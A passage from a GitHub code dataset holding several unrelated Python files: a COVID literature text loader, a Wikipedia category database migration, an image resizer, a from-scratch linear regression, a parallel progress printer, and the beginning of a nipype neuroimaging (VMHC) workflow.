ret.keys():\n ret[word] = ret[word] + 1\n else:\n ret[word] = 1\n\n return ret\n\n def to_string(self):\n return_val = {\n \"pmid\": self.pmid,\n \"title\": self.title,\n \"abstract\": self.abstract,\n \"label\": self.label\n }\n return json.dumps(return_val)\n\n def is_equal(self, other):\n if self.pmid == other.pmid:\n return True\n return False\n\n\ndef get_train_and_test_data_as_list() -> tuple:\n train_filename = \"./Datasets/BC7-LitCovid-Train.csv\"\n test_filename = \"./Datasets/BC7-LitCovid-Dev.csv\"\n\n train_data = read_csv(train_filename)\n train_data = normalize_data(train_data, IS_LABEL_INT)\n\n test_data = read_csv(test_filename)\n test_data = normalize_data(test_data, IS_LABEL_INT)\n\n train_data = [Document(row) for row in train_data]\n test_data = [Document(row) for row in test_data]\n\n return train_data, test_data\n\n\ndef read_csv(file_name:str) -> list:\n data = csv.reader(open(file_name, \"rt\"))\n\n return list(data)[1:]\n\n\ndef normalize_data(data: list, labels_int: bool) -> list:\n for data_index in PROCESS_INDEXES:\n for i in range(len(data)):\n data[i][data_index] = get_words(data[i][data_index])\n\n update_labels(data, labels_int)\n\n return data\n\n\ndef get_words(input: str, is_remove_stopwords: bool = True) -> list:\n input_words = input.translate(str.maketrans('', '', string.punctuation)).lower()\n if is_remove_stopwords:\n input_words = remove_stopwords(input_words.split())\n\n return input_words\n\n\ndef remove_stopwords(words: list) -> list:\n ret = []\n\n for word in words:\n if word not in STOPWORDS:\n ret.append(word)\n\n return ret\n\n\ndef update_labels(original_data, is_int: bool):\n for i in range(len(original_data)):\n labels = original_data[i][-1]\n labels = labels.lower()\n labels = labels.split(';')\n\n original_data[i][-1] = encode_label(labels) if is_int else labels\n\n assert original_data[i][-1]\n\n\ndef encode_label(labels: str) -> int:\n ret = 0\n\n for j in range(len(CLASSES)):\n if CLASSES[j] in labels:\n ret = ret | (1 << j)\n\n return ret\n\n\ndef create_dump_path(path):\n os.makedirs(os.path.dirname(path), exist_ok=True)\n\n\ndef dump(train_list: list, test_list: list):\n path = os.path.join(\".\", \"dump_files\", \"\")\n path_train = os.path.join(\".\", \"dump_files\", \"train\")\n path_test = os.path.join(\".\", \"dump_files\", \"test\")\n create_dump_path(path)\n\n docnum: int = 0\n train_dump = open(path_train, \"w\")\n to_write = {}\n for single_doc in train_list:\n single_dict = single_doc.to_string()\n to_write[docnum] = single_dict\n docnum = docnum + 1\n json.dump(to_write, train_dump)\n train_dump.close()\n\n docnum = 0\n test_dump = open(path_test, \"w\")\n to_write = {}\n for single_doc in test_list:\n single_dict = single_doc.to_string()\n to_write[docnum] = single_dict\n docnum = docnum + 1\n json.dump(to_write, test_dump)\n test_dump.close()\n\n\ndef write_dump_files():\n train_data, test_data = get_train_and_test_data_as_list()\n dump(train_data, test_data)\n\n\ndef read_dump_files():\n\n train_list = []\n test_list = []\n\n raw_file_train = open(\"./dump_files/train\")\n raw = json.load(raw_file_train)\n for i in range(len(raw)):\n key = str(i)\n raw_doc = json.loads(raw[key])\n pmid = raw_doc[\"pmid\"]\n title = raw_doc[\"title\"]\n abstract = raw_doc[\"abstract\"]\n label = raw_doc[\"label\"]\n params = [pmid, \"\", title, abstract, \"\", \"\", \"\", \"\", label]\n train_list.append(Document(params))\n raw_file_train.close()\n\n raw_file_test = open(\"./dump_files/test\")\n raw = json.load(raw_file_test)\n for i in range(len(raw)):\n key = str(i)\n raw_doc = json.loads(raw[key])\n pmid = raw_doc[\"pmid\"]\n title = raw_doc[\"title\"]\n abstract = raw_doc[\"abstract\"]\n label = raw_doc[\"label\"]\n params = [pmid, \"\", title, abstract, \"\", \"\", \"\", \"\", label]\n test_list.append(Document(params))\n raw_file_test.close()\n\n return train_list, test_list\n","repo_name":"Voursstrreds/TextClassificationCovid19","sub_path":"FileReader.py","file_name":"FileReader.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42778308017","text":"import json\n\nfrom app import db, Category, CatLink\n\ndb.drop_all()\ndb.create_all()\n\nprint(\"Migrating Categories...\")\nwith open(\"ranked_cats.json\") as jsonfile:\n js = json.load(jsonfile)\n db.session.add_all(Category(pageid=int(k), pagecount=v['page_count'])\n for k, v in js.items())\n\nprint(\"Migrating CatLinks...\")\nwith open(\"all_subcats.json\") as jsonfile:\n js = json.load(jsonfile)\n db.session.add_all(CatLink(parent_id=int(k), child_id=int(c))\n for k, v in js.items()\n if k != 'None'\n for c in set(v))\n\nprint(\"Committing...\")\ndb.session.commit()\n","repo_name":"zero-fifteen/random-wiki","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39026715728","text":"#!/usr/bin/env python\n\n\ndef get_size(filename):\n from PIL import Image\n image = Image.open(filename)\n return image.size\n\n\ndef resize(newfilename, filename, newsize):\n from PIL import Image\n image = Image.open(filename)\n image = image.resize(newsize)\n image.save(newfilename)\n\n\ndef create_thumbnail(thumbnail_name, filename, factor=6):\n orig_size = get_size(filename)\n newsize = (orig_size[0]/factor, orig_size[1]/factor)\n resize(thumbnail_name, filename, newsize)\n\n\ndef get_name_and_orientation(filename, prefix=\"reduced\"):\n resized_filename = \"{0}_{1}\".format(prefix, filename)\n\n size = get_size(filename)\n if size[0] > size[1]:\n newsize = (600, 450)\n orientation = \"horizontal\"\n else:\n newsize = (450, 600)\n orientation = \"vertical\"\n\n return (resized_filename, orientation)\n\n\ndef resize_without_thumbnail(filename, prefix=\"reduced\"):\n\n resized_filename = \"{0}_{1}\".format(prefix, filename)\n\n size = get_size(filename)\n if size[0] > size[1]:\n newsize = (600, 450)\n orientation = \"horizontal\"\n else:\n newsize = (450, 600)\n orientation = \"vertical\"\n resize(resized_filename, filename, newsize)\n\n return (resized_filename, orientation)\n\n\ndef resize_and_thumbnail(filename):\n thumbnail_filename = \"thumb_{0}\".format(filename)\n (resized_filename, orientation) = resize_without_thumbnail(filename)\n create_thumbnail(thumbnail_filename, resized_filename)\n\nif __name__ == \"__main__\":\n from sys import argv\n\n filename = argv[1]\n resize_and_thumbnail(filename)\n","repo_name":"kd0kfo/photoalbum","sub_path":"photoalbum/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"21171862183","text":"# Approximate Value\r\n# y = wx + b\r\n\r\n# cost function\r\n\r\n# MSE = J(m,b) = 1/N * (for all i (actual-predicated)^2)\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Linearregression:\r\n \r\n def __init__(self,filename,lr=0.001, iterations = 1000):\r\n self.lr = lr\r\n self.iterations = iterations\r\n self.weights = None\r\n self.bias = None\r\n self.filename = filename\r\n \r\n \r\n def plot_data(self,X,Y):\r\n plt.plot(X,Y)\r\n plt.scatter(X,Y,edgecolors='blue',color='red')\r\n plt.xlabel(\"Experience\")\r\n plt.ylabel(\"Salary\")\r\n plt.title(\"Experience vs Salaries\")\r\n plt.show()\r\n \r\n def plot_reg_line(self,X,Y):\r\n plt.plot(X,(self.weights[0]*X)+self.bias)\r\n plt.scatter(X,Y,edgecolors='blue',color='red')\r\n plt.xlabel(\"Experience\")\r\n plt.ylabel(\"Regression Line\")\r\n plt.title(\"Regression Line\")\r\n plt.show()\r\n \r\n \r\n \r\n \r\n def load_data(self):\r\n dataset = pd.read_csv(self.filename).values\r\n X=dataset[:,:-1]\r\n Y=dataset[:,-1]\r\n return X,Y\r\n \r\n \r\n \r\n def fit(self,X,Y):\r\n ##Initializing parameters\r\n n_samples,n_features = X.shape\r\n self.weights = np.zeros(n_features)\r\n self.bias = 0\r\n print(\"X_train_Shape : \", X.shape)\r\n print(\"Y_train_Shape : \", Y.shape)\r\n \r\n for _ in range(self.iterations):\r\n # New weight = Old weight - learning rate * derivative(old weight)\r\n # Y_predicted = wx+b\r\n \r\n \r\n Y_predicted = np.dot(X,self.weights) + self.bias\r\n \r\n dw = (1/n_samples) *(2* np.dot(X.T,(Y_predicted-Y)))\r\n db = (1/n_samples) *(2* np.sum(Y_predicted-Y))\r\n \r\n self.weights = self.weights - self.lr * dw\r\n self.bias = self.weights - self.lr * db\r\n \r\n \r\n \r\n \r\n def predict(self,X):\r\n Y_predicted = np.dot(X,self.weights) + self.bias\r\n return Y_predicted\r\n \r\n def print_MSE(self,Y_test,Y_pred):\r\n print(\"Mean Squared Error : \", np.sum(np.square(Y_pred-Y_test))/len(Y_pred))\r\n \r\n\r\nobj = Linearregression(\"Salary_data.csv\",lr=0.023,iterations=1000)\r\nX,Y = obj.load_data()\r\nobj.plot_data(X, Y)\r\nobj.fit(X,Y)\r\nY_pred = obj.predict(X)\r\nobj.plot_reg_line(X, Y)\r\nobj.print_MSE(Y, Y_pred)\r\n \r\n ","repo_name":"Adit-jain/Multinomial_regression_From_Scratch","sub_path":"Linear Regression from scratch/LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7249934026","text":"import datetime\nimport numpy as np\nimport pandas as pd\nfrom itertools import repeat\n\n\nclass ParallelPrinter:\n\n program_started = False\n\n def __init__(self, total_procs, proc_job_dict):\n \"\"\"\n Constructor method to initialize the parallel printer. It will\n initialize the printing format based on the amount of processes.\n\n :param total_procs: The total number of processes.\n :param proc_job_dict: A dictionary the number of jobs\n associated with each processes.\n \"\"\"\n\n self.prev_print_carriage = False\n\n # Assigns the parameters for later reference.\n\n self.total_procs = total_procs\n self.proc_job_dict = proc_job_dict\n self.max_jobs = max(self.proc_job_dict.values())\n self.min_jobs = min(self.proc_job_dict.values())\n self.current_job = 0\n\n self.proc_job_completed_dict = {proc: 0\n for proc in self.proc_job_dict.keys()}\n\n # Creates a dataframe of the time it takes to complete each job\n # within each process.\n\n self.start_time = None\n self.job_time_tracker = pd.DataFrame(np.nan,\n index=range(0, self.max_jobs),\n columns=self.proc_job_dict.keys())\n\n # Initializes the printables to be edited in the\n # configure_prints methods.\n\n self.regular_divider = ''\n self.parallel_title = ''\n self.parallel_message = ''\n\n self.configure_prints()\n\n def configure_prints(self):\n \"\"\"\n Method to configure the printable statements based on a variable\n number of processes and jobs.\n\n \"\"\"\n\n # Creates a tuple to be referenced in the divider string. The\n # + 2 accomodates for the time and job completion columns.\n tup = tuple(repeat((''), self.total_procs + 2))\n\n time_col_len = 12\n job_col_len = 17\n\n # Determines the process column length from whats left after the\n # time and job completion columns are allocated. Note, the\n # process columns are of equal length. Therefore, any extra\n # space is allocated to the time column.\n\n process_col_len = (120 - time_col_len - job_col_len) // self.total_procs\n time_col_len += (120 - time_col_len - job_col_len) % self.total_procs\n\n # Creates a formattable string based on the lengths of each\n # column for the divider.\n\n time_col_div_str = '+{:-<' + str(time_col_len - 2) + '}+'\n job_col_div_str = '{:-<' + str(job_col_len - 1) + '}+'\n process_col_div_str = '{:-<' + str(process_col_len - 1) + '}+'\n\n # Concatenates the formattable strings and formats them with an\n # empty tuple.\n\n parallel_divider_fmt = time_col_div_str + \\\n job_col_div_str + \\\n process_col_div_str * self.total_procs\n self.parallel_divider = parallel_divider_fmt.format(*tup)\n\n # Creates a formattable string based on the lengths of each\n # column for the messages.\n\n time_col_msg_str = '| {:>' + str(time_col_len - 4) + '} |'\n job_col_msg_str = ' {:>' + str(job_col_len - 3) + '} |'\n process_col_msg_str = ' {:>' + str(process_col_len - 3) + '} |'\n self.parallel_message = time_col_msg_str + \\\n job_col_msg_str + \\\n process_col_msg_str * self.total_procs\n\n # Creates a tuple of titles for each process. Then, assigns the\n # Time, job completion, and process title tuple to a regular\n # parallel message string to create the title.\n\n process_titles = tuple(['P_' + str(i)\n for i in range(1, self.total_procs + 1)])\n self.parallel_title = self.parallel_message.format('Time',\n 'Job # / Total',\n *process_titles)\n\n def update(self, proc_num: int, job_num: int):\n \"\"\"\n Method to update the information the parallel printer is\n tracking. It will only print if that job is completed for all\n processes.\n :param proc_num: The integer id of the process.\n :param job_num: The integer id of the job.\n \"\"\"\n\n # Assigns the time completed to the job_tracker.\n\n time_completed = datetime.datetime.now().replace(microsecond=0)\n self.job_time_tracker.iloc[job_num, proc_num] = time_completed\n\n self.proc_job_completed_dict[proc_num] += 1\n\n # self.print_jobs_completed()\n\n # Checks to see if the jobs in that index are also completed\n # in the other processes.\n non_min_procs = [proc for proc in self.proc_job_dict.keys()\n if self.proc_job_dict[proc] > job_num]\n\n if not self.job_time_tracker.iloc[job_num, non_min_procs].isnull().values.any():\n self.print_parallel_message(job_num)\n\n def print_jobs_completed(self):\n current_time = datetime.datetime.now().time().replace(microsecond=0)\n total_jobs = sum(self.proc_job_dict.values())\n jobs_completed = sum(self.proc_job_completed_dict.values())\n\n job_str = '{:d} / {:d}'.format(jobs_completed, total_jobs)\n\n job_strs = ['{:} / {:}'.format(str(self.proc_job_completed_dict[proc]),\n str(self.proc_job_dict[proc])) for proc in self.proc_job_dict.keys()]\n\n if self.prev_print_carriage:\n print('\\r', end='')\n print(self.parallel_message.format(str(current_time),\n job_str, *job_strs),\n end='', flush=True)\n\n else:\n print(self.parallel_message.format(str(current_time),\n job_str, *job_strs),\n end='', flush=True)\n self.prev_print_carriage = True\n\n def print_parallel_message(self, job_num: int):\n \"\"\"\n Method to print a message of information gained about the\n parallel processes.\n :param job_num: The integer id of the job.\n \"\"\"\n\n # Gets the current time.\n\n current_time = datetime.datetime.now().time().replace(microsecond=0)\n\n # Creates and formats the job completion string.\n\n job_str = '{:d} / {:d}'.format(job_num + 1, self.max_jobs)\n\n # Checks to see if this is the first job completed, if it is,\n # then it does not try to print a time delta. If it is not, then\n # it will print the differences in time completed for the jobs.\n\n print('\\r', end='')\n self.prev_print_carriage = False\n\n if job_num == 0:\n prev_job_times = self.start_time\n current_job_times = self.job_time_tracker.iloc[job_num, :].values\n\n cond = current_job_times != -1\n splits = np.where(cond, current_job_times - prev_job_times, '-')\n\n job_times = tuple([str(split) for split in splits])\n\n print(self.parallel_message.format(str(current_time),\n job_str,\n *job_times))\n else:\n\n prev_job_times = self.job_time_tracker.iloc[job_num - 1, :].values\n current_job_times = self.job_time_tracker.iloc[job_num, :].values\n\n cond = current_job_times != -1\n splits = np.where(cond, current_job_times - prev_job_times, '-')\n\n job_times = tuple([str(split) for split in splits])\n\n print(self.parallel_message.format(str(current_time),\n job_str,\n *job_times))\n\n self.print_jobs_completed()\n\n def print_notify_parallel_begin(self):\n \"\"\"\n Method to print the notification of the beginning of a parallel\n printing sequence.\n \"\"\"\n\n self.start_time = datetime.datetime.now().replace(microsecond=0)\n\n print(self.parallel_divider)\n print(self.parallel_title)\n print(self.parallel_divider)\n\n def print_notify_parallel_end(self):\n \"\"\"\n Method to print the notification of the ending of a parallel\n printing sequence.\n \"\"\"\n\n print(self.parallel_divider)\n\n","repo_name":"Lucas-Frey/Time_Series_Modeler","sub_path":"Utils/ParallelPrinter.py","file_name":"ParallelPrinter.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8302283609","text":"import sys\nimport os\nimport subprocess\nimport nipype.pipeline.engine as pe\nimport nipype.algorithms.rapidart as ra\nimport nipype.interfaces.fsl as fsl\nimport nipype.interfaces.io as nio\nimport nipype.interfaces.utility as util\nfrom .utils import *\nfrom CPAC.vmhc import *\nfrom nipype.interfaces.afni import preprocess\nfrom CPAC.registration import create_wf_calculate_ants_warp, \\\n create_wf_c3d_fsl_to_itk, \\\n create_wf_collect_transforms, \\\n create_wf_apply_ants_warp\n\ndef create_vmhc(use_ants, name='vmhc_workflow'):\n\n \"\"\"\n Compute the map of brain functional homotopy, the high degree of synchrony in spontaneous activity between geometrically corresponding interhemispheric (i.e., homotopic) regions.\n\n\n\n Parameters\n ----------\n\n None\n\n Returns\n -------\n\n vmhc_workflow : workflow\n\n Voxel Mirrored Homotopic Connectivity Analysis Workflow\n\n\n\n Notes\n -----\n\n `Source `_ \n\n Workflow Inputs::\n\n inputspec.brain : string (existing nifti file)\n Anatomical image(without skull)\n\n inputspec.symmetric_brain : string (existing nifti file)\n MNI152_T1_2mm_symmetric_brain.nii.gz\n \n inputspec.rest_res_filt : string (existing nifti file)\n Band passed Image with nuisance signal regressed out(and optionally scrubbed). Recommended bandpass filter (0.001,0.1) )\n\n inputspec.reorient : string (existing nifti file)\n RPI oriented anatomical data\n\n inputspec.example_func2highres_mat : string (existing affine transformation .mat file)\n Specifies an affine transform that should be applied to the example_func before non linear warping\n\n inputspec.standard_for_func: string (existing nifti file)\n MNI152_T1_standard_resolution_brain.nii.gz\n\n inputspec.symmetric_skull : string (existing nifti file)\n MNI152_T1_2mm_symmetric.nii.gz\n\n inputspec.twomm_brain_mask_dil : string (existing nifti file)\n MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz\n\n inputspec.config_file_twomm_symmetric : string (existing .cnf file)\n T1_2_MNI152_2mm_symmetric.cnf\n\n inputspec.rest_mask : string (existing nifti file)\n A mask functional volume(derived by dilation from motion corrected functional volume)\n\n fwhm_input.fwhm : list (float) \n For spatial smoothing the Z-transformed correlations in MNI space.\n Generally the value of this parameter is 1.5 or 2 times the voxel size of the input Image.\n\n inputspec.mean_functional : string (existing nifti file)\n The mean functional image for use in the func-to-anat registration matrix conversion\n to ITK (ANTS) format, if the user selects to use ANTS.\n\n \n Workflow Outputs::\n\n outputspec.highres2symmstandard : string (nifti file)\n Linear registration of T1 image to symmetric standard image\n\n outputspec.highres2symmstandard_mat : string (affine transformation .mat file)\n An affine transformation .mat file from linear registration and used in non linear registration\n\n outputspec.highres2symmstandard_warp : string (nifti file)\n warp file from Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.fnirt_highres2symmstandard : string (nifti file)\n Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.highres2symmstandard_jac : string (nifti file)\n jacobian determinant image from Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.rest_res_2symmstandard : string (nifti file)\n nonlinear registration (func to standard) image\n\n outputspec.VMHC_FWHM_img : string (nifti file)\n pearson correlation between res2standard and flipped res2standard\n\n outputspec.VMHC_Z_FWHM_img : string (nifti file)\n Fisher Z transform map\n\n outputspec.VMHC_Z_stat_FWHM_img : string (nifti file)\n Z statistic map\n\n Order of commands:\n\n - Perform linear registration of Anatomical brain in T1 space to symmetric standard space. For details see `flirt `_::\n\n flirt\n -ref MNI152_T1_2mm_symmetric_brain.nii.gz\n -in mprage_brain.nii.gz\n -out highres2symmstandard.nii.gz\n -omat highres2symmstandard.mat\n -cost corratio\n -searchcost corratio\n -dof 12\n -interp trilinear \n \n - Perform nonlinear registration (higres to standard) to symmetric standard brain. For details see `fnirt `_::\n \n fnirt\n --in=head.nii.gz\n --aff=highres2symmstandard.mat\n --cout=highres2symmstandard_warp.nii.gz\n --iout=fnirt_highres2symmstandard.nii.gz\n --jout=highres2symmstandard_jac.nii.gz\n --config=T1_2_MNI152_2mm_symmetric.cnf\n --ref=MNI152_T1_2mm_symmetric.nii.gz\n --refmask=MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz\n --warpres=10,10,10 \n\n - Perform spatial smoothing on the input functional image(inputspec.rest_res_filt). For details see `PrinciplesSmoothing `_ `fslmaths `_::\n\n fslmaths rest_res_filt.nii.gz\n -kernel gauss FWHM/ sqrt(8-ln(2))\n -fmean -mas rest_mask.nii.gz\n rest_res_filt_FWHM.nii.gz\n \n - Apply nonlinear registration (func to standard). For details see `applywarp `_::\n \n applywarp\n --ref=MNI152_T1_2mm_symmetric.nii.gz\n --in=rest_res_filt_FWHM.nii.gz\n --out=rest_res_2symmstandard.nii.gz\n --warp=highres2symmstandard_warp.nii.gz\n --premat=example_func2highres.mat\n \n \n - Copy and L/R swap the output of applywarp command (rest_res_2symmstandard.nii.gz). For details see `fslswapdim `_::\n\n fslswapdim\n rest_res_2symmstandard.nii.gz\n -x y z\n tmp_LRflipped.nii.gz\n\n\n - Calculate pearson correlation between rest_res_2symmstandard.nii.gz and flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz). For details see `3dTcorrelate `_::\n \n 3dTcorrelate\n -pearson\n -polort -1\n -prefix VMHC_FWHM.nii.gz\n rest_res_2symmstandard.nii.gz\n tmp_LRflipped.nii.gz\n \n \n - Fisher Z Transform the correlation. For details see `3dcalc `_::\n \n 3dcalc\n -a VMHC_FWHM.nii.gz\n -expr 'log((a+1)/(1-a))/2'\n -prefix VMHC_FWHM_Z.nii.gz\n \n \n - Calculate the number of volumes(nvols) in flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz) ::\n \n -Use Nibabel to do this\n \n \n - Compute the Z statistic map ::\n \n 3dcalc\n -a VMHC_FWHM_Z.nii.gz\n -expr 'a*sqrt('${nvols}'-3)'\n -prefix VMHC_FWHM_Z_stat.nii.gz\n \n \n Workflow:\n \n .. image:: ../images/vmhc_graph.dot.png\n :width: 500 \n \n Workflow Detailed:\n \n .. image:: ../images/vmhc_detailed_graph.dot.png\n :width: 500 \n \n\n References\n ----------\n \n .. [1] Zuo, X.-N., Kelly, C., Di Martino, A., Mennes, M., Margulies, D. S., Bangaru, S., Grzadzinski, R., et al. (2010). Growing together and growing apart: regional and sex differences in the lifespan developmental trajectories of functional homotopy. The Journal of neuroscience : the official journal of the Society for Neuroscience, 30(45), 15034-43. doi:10.1523/JNEUROSCI.2612-10.2010\n\n\n Examples\n --------\n \n >>> vmhc_w = create_vmhc()\n >>> vmhc_w.inputs.inputspec.symmetric_brain = 'MNI152_T1_2mm_symmetric_brain.nii.gz'\n >>> vmhc_w.inputs.inputspec.symmetric_skull = 'MNI152_T1_2mm_symmetric.nii.gz'\n >>> vmhc_w.inputs.inputspec.twomm_brain_mask_dil = 'MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz'\n >>> vmhc_w.inputs.inputspec.config_file_twomm = 'T1_2_MNI152_2mm_symmetric.cnf'\n >>> vmhc_w.inputs.inputspec.standard_for_func= 'MNI152_T1_2mm.nii.gz'\n >>> vmhc_w.inputs.fwhm_input.fwhm = [4.5, 6]\n >>> vmhc_w.get_node('fwhm_input').iterables = ('fwhm', [4.5, 6])\n >>> vmhc_w.inputs.inputspec.rest_res = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_res_filt.nii.gz')\n >>> vmhc_w.inputs.inputspec.reorient = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_RPI.nii.gz')\n >>> vmhc_w.inputs.inputspec.brain = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_brain.nii.gz')\n >>> vmhc_w.inputs.inputspec.example_func2highres_mat = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/reg/example_func2highres.mat')\n >>> vmhc_w.inputs.inputspec.rest_mask = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_mask.nii.gz')\n >>> vmhc_w.run() # doctest: +SKIP\n\n \"\"\"\n\n vmhc = pe.Workflow(name=name)\n inputNode = pe.Node(util.IdentityInterface(fields=['rest_res',\n 'example_func2highres_mat',\n 'rest_mask',\n 'standard_for_func',\n 'mean_functional',\n 'brain',\n 'fnirt_nonlinear_warp',\n 'ants_symm_initial_xfm',\n 'ants_symm_rigid_xfm',\n 'ants_symm_affine_xfm',\n 'ants_symm_warp_field']),\n name='inputspec')\n\n\n outputNode = pe.Node(util.IdentityInterface(fields=['rest_res_2symmstandard',\n 'VMHC_FWHM_img',\n 'VMHC_Z_FWHM_img',\n 'VMHC_Z_stat_FWHM_img'\n ]),\n name='outputspec')\n\n\n inputnode_fwhm = pe.Node(util.IdentityInterface(fields=['fwhm']),\n name='fwhm_input')\n\n\n if use_ants == False:\n\n ## Apply nonlinear registration (func to standard)\n nonlinear_func_to_standard = pe.Node(interface=fsl.ApplyWarp(),\n name='nonlinear_func_to_standard')\n\n elif use_ants == True:\n\n # ANTS warp image etc.\n fsl_to_itk_vmhc = create_wf_c3d_fsl_to_itk(0, name='fsl_to_itk_vmhc')\n\n collect_transforms_vmhc = create_wf_collect_transforms(0, name='collect_transforms_vmhc')\n\n apply_ants_xfm_vmhc = create_wf_apply_ants_warp(0,name='apply_ants_xfm_vmhc')\n\n # this has to be 3 instead of default 0 because it is a 4D file\n apply_ants_xfm_vmhc.inputs.inputspec.input_image_type = 3\n\n\n\n ## copy and L/R swap file\n copy_and_L_R_swap = pe.Node(interface=fsl.SwapDimensions(),\n name='copy_and_L_R_swap')\n copy_and_L_R_swap.inputs.new_dims = ('-x', 'y', 'z')\n\n ## caculate vmhc\n pearson_correlation = pe.Node(interface=preprocess.TCorrelate(),\n name='pearson_correlation')\n pearson_correlation.inputs.pearson = True\n pearson_correlation.inputs.polort = -1\n pearson_correlation.inputs.outputtype = 'NIFTI_GZ'\n\n z_trans = pe.Node(interface=preprocess.Calc(),\n name='z_trans')\n z_trans.inputs.expr = 'log((1+a)/(1-a))/2'\n z_trans.inputs.outputtype = 'NIFTI_GZ'\n\n z_stat = pe.Node(interface=preprocess.Calc(),\n name='z_stat')\n z_stat.inputs.outputtype = 'NIFTI_GZ'\n\n NVOLS = pe.Node(util.Function(input_names=['in_files'],\n output_names=['nvols'],\n function=get_img_nvols),\n name='NVOLS')\n\n generateEXP = pe.Node(util.Function(input_names=['nvols'],\n output_names=['expr'],\n function=get_operand_expression),\n name='generateEXP')\n\n\n smooth = pe.Node(interface=fsl.MultiImageMaths(),\n name='smooth')\n\n\n if use_ants == False:\n\n vmhc.connect(inputNode, 'rest_res',\n smooth, 'in_file')\n vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),\n smooth, 'op_string')\n vmhc.connect(inputNode, 'rest_mask',\n smooth, 'operand_files')\n vmhc.connect(smooth, 'out_file',\n nonlinear_func_to_standard, 'in_file')\n vmhc.connect(inputNode, 'standard_for_func',\n nonlinear_func_to_standard, 'ref_file')\n vmhc.connect(inputNode, 'fnirt_nonlinear_warp',\n nonlinear_func_to_standard, 'field_file')\n ## func->anat matrix (bbreg)\n vmhc.connect(inputNode, 'example_func2highres_mat',\n nonlinear_func_to_standard, 'premat')\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n copy_and_L_R_swap, 'in_file')\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n pearson_correlation, 'xset')\n\n elif use_ants == True:\n\n # connections for ANTS stuff\n\n # functional apply warp stuff\n\n vmhc.connect(inputNode, 'rest_res',\n smooth, 'in_file')\n vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),\n smooth, 'op_string')\n vmhc.connect(inputNode, 'rest_mask',\n smooth, 'operand_files')\n\n vmhc.connect(smooth, 'out_file',\n apply_ants_xfm_vmhc, 'inputspec.input_image')\n\n vmhc.connect(inputNode, 'ants_symm_initial_xfm',\n collect_transforms_vmhc, 'inputspec.linear_initial')\n\n vmhc.connect(inputNode, 'ants_symm_rigid_xfm',\n collect_transforms_vmhc, 'inputspec.linear_rigid')\n\n vmhc.connect(inputNode, 'ants_symm_affine_xfm',\n collect_transforms_vmhc, 'inputspec.linear_affine')\n\n vmhc.connect(inputNode, 'ants_symm_warp_field',\n collect_transforms_vmhc, 'inputspec.warp_file')\n\n ## func->anat matrix (bbreg)\n vmhc.connect(inputNode, 'example_func2highres_mat',\n fsl_to_itk_vmhc, 'inputspec.affine_file')\n\n vmhc.connect(inputNode, 'brain', fsl_to_itk_vmhc,\n 'inputspec.reference_file')\n\n vmhc.connect(inputNode, 'mean_functional', fsl_to_itk_vmhc,\n 'inputspec.source_file')\n\n vmhc.connect(fsl_to_itk_vmhc, 'outputspec.itk_transform', \n collect_transforms_vmhc, 'inputspec.fsl_to_itk_affine')\n\n vmhc.connect(inputNode, 'standard_for_func',\n apply_ants_xfm_vmhc, 'inputspec.reference_image')\n\n vmhc.connect(collect_transforms_vmhc, \\\n 'outputspec.transformation_series', \\\n apply_ants_xfm_vmhc, 'inputspec.transforms')\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n copy_and_L_R_swap, 'in_file')\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n pearson_correlation, 'xset')\n\n\n vmhc.connect(copy_and_L_R_swap, 'out_file',\n pearson_correlation, 'yset')\n vmhc.connect(pearson_correlation, 'out_file',\n z_trans, 'in_file_a')\n vmhc.connect(copy_and_L_R_swap, 'out_file',\n NVOLS, 'in_files')\n vmhc.connect(NVOLS, 'nvols',\n generateEXP, 'nvols')\n vmhc.connect(z_trans, 'out_file',\n z_stat, 'in_file_a')\n vmhc.connect(generateEXP, 'expr',\n z_stat, 'expr')\n\n if use_ants == False:\n\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n outputNode, 'rest_res_2symmstandard')\n\n elif use_ants == True:\n\n # ANTS warp outputs to outputnode\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n outputNode, 'rest_res_2symmstandard')\n\n\n vmhc.connect(pearson_correlation, 'out_file',\n outputNode, 'VMHC_FWHM_img')\n vmhc.connect(z_trans, 'out_file',\n outputNode, 'VMHC_Z_FWHM_img')\n vmhc.connect(z_stat, 'out_file',\n outputNode, 'VMHC_Z_stat_FWHM_img')\n\n\n return 